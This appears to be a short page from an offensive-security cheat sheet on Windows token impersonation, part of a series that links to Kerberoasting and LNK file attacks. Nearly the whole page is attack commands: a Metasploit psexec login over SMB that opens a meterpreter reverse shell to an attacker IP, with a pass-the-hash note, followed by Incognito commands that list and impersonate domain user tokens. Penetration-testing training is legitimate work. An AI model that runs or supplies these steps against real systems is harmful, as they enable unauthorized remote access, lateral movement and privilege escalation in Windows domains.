Token Impersonation

Connect to a Device using Metasploit

msfconsole
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp

set lhost [Attacker IP]

set rhosts [Target IP]

set smbuser [Username]

# set SMBPASS [Hash] (If you only have the hash, you can only pass the hash locally)
set smbpass [Password]

# Unset SMBDomain (If you want to use local)
set smbdomain [Domain]

run

Load Incognito Module

load incognito

List Tokens

list_tokens -u

Impersonate Token

impersonate_token [Domain]\\[Username]

PreviousKerberoasting NextLNK File Attack

Last updated 6 months ago